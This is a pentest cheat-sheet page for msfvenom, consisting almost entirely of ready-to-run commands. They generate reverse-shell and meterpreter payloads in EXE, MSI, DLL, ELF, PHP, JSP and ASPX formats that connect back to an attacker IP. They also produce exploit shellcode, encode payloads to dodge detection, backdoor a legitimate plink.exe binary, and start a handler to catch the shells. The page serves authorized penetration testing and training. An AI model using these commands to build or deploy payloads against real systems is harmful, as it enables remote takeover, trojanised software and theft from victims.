CyberCheatsheets

msfvenom Cheat Sheet

Generate and encode standalone payloads (reverse shells, shellcode, MSI/EXE/ELF) for authorized exploitation.

Exploitation & Payloadsmetasploitmsfvenompayloadreverse-shellshellcodeUpdated 2026-06-17

Overview

msfvenom is Metasploit's payload generator. It combines payload selection, encoding, and output formatting in one command. Use it to build reverse/bind shells in any format (EXE, ELF, MSI, PHP, ASPX, raw shellcode). Pair a reverse payload with a matching multi/handler listener in msfconsole.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Discover payloads and options

List payloads (filter as needed)

msfvenom -l payloads | grep meterpreter

List output formats (exe, elf, raw, ...)

msfvenom -l formats

List encoders

msfvenom -l encoders

Show a payload's required options

msfvenom -p windows/x64/meterpreter/reverse_tcp --list-options

Windows payloads

64-bit meterpreter EXE

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=443 -f exe -o shell.exe

Staged-less plain reverse shell EXE

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f exe -o rev.exe

MSI (AlwaysInstallElevated)

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f msi -o evil.msi

DLL for sideloading/hijack

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=443 -f dll -o evil.dll

Linux / web payloads

Linux 64-bit reverse shell ELF

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f elf -o shell.elf

PHP reverse shell

msfvenom -p php/reverse_php LHOST=10.10.14.5 LPORT=443 -f raw -o shell.php

JSP reverse shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f raw -o shell.jsp

ASPX webshell payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=443 -f aspx -o shell.aspx

Shellcode (for exploit dev)

C shellcode, bad chars removed

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f c -b '\x00\x0a\x0d'

Python shellcode var named sc

msfvenom -p linux/x86/exec CMD=/bin/sh -f python -v sc

Encoding & evasion

5 iterations of shikata_ga_nai

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=443 -e x86/shikata_ga_nai -i 5 -f exe -o enc.exe

Modern AV detects shikata; rely on it for bad-char avoidance, not evasion.

Inject payload into a legit template binary (-x), keep functionality (-k)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=443 -x /usr/share/windows-binaries/plink.exe -k -f exe -o backdoored.exe

Catch the shell

One-line multi/handler matching your payload

msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 10.10.14.5; set LPORT 443; run"

Tips

  • The handler payload, LHOST, and LPORT must match the generated payload exactly.
  • Use staged payloads (.../meterpreter/reverse_tcp) when bandwidth is fine; use stageless (_reverse_tcp with shell) when the stager is blocked.
  • 443 and 53 are good LPORT choices — they're commonly allowed outbound.
  • Set bad chars with -b when writing into a buffer-overflow exploit.

References

Related cheat sheets